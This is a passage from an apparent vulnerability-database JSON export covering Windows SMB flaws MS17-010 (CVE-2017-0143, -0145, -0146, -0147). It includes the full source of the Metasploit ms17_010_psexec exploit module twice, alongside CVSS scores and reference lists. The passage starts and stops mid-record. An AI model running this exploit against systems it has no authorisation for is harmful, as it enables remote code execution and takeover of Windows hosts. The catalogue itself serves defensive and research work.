write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 10\n },\n 'References' =>\n [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn\n service_filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\n service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''\n\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 1649}, "differentElements": ["published", "modified"], "edition": 181, "lastseen": "2020-08-23T19:06:33"}], "viewCount": 2103, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2020-10-07T20:08:39", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-10-07T20:08:39", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_psexec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 10\n },\n 'References' =>\n [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-03-14',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn\n service_filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\n service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''\n\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e6f53676ca888a6a837a24417efa2477"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "47b769fdc546934555b5b0069a032cde"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e80bef8ab7c34172a2f61c17200cdbec"}, {"key": "published", "hash": "b1b79302e85cd03f0ea3818121409a3e"}, {"key": "references", "hash": "7bc839b0566b34ac03da233f997066ff"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "0f387fb9bc28015146a12fe47c73e11c"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:ILITIES/MSFT-CVE-2017-0145/", "hash": "64347397548b2445d390ef54a8eff89959982ad00d9064a38071ba0d059300a1", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft CVE-2017-0145: Windows SMB Remote Code Execution Vulnerability", "description": "\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-04-14T05:31:31", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T05:31:31", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-04-14T05:31:31", "rev": 2, "value": 8.6, "vector": "NONE"}}, "hash": "db9f98f1067d08a43891fea7979bb2413b0b5087c2647f74f4e447483a2e4dba", "hashmap": [{"hash": "e41c633535127bd51fec6e5a3103a16c", "key": "title"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "68b329da9893e34099c7d8ad5cb9c940", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "modified"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}], "history": [], "href": "", "id": "MSF:ILITIES/MSFT-CVE-2017-0145/", "immutableFields": [], "lastseen": "2021-04-14T05:31:31", "modified": "1976-01-01T00:00:00", "objectVersion": "1.5", "published": "1976-01-01T00:00:00", "references": [], "reporter": "Rapid7", "title": "Microsoft CVE-2017-0145: Windows SMB Remote Code Execution Vulnerability", "type": "metasploit", "viewCount": 17}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-04-14T05:31:31"}], "viewCount": 64, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-14T05:31:31", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-04-14T05:31:31", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "", "sourceData": "", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "68b329da9893e34099c7d8ad5cb9c940"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "published", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "e41c633535127bd51fec6e5a3103a16c"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:ILITIES/MSFT-CVE-2017-0146/", "hash": "306096e3ea0bd0d368cfbf93c4f05bede979388be7e4a5eae1e750d684466bb2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft CVE-2017-0146: Windows SMB Remote Code Execution Vulnerability", "description": "\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-04-14T05:32:32", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T05:32:32", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, 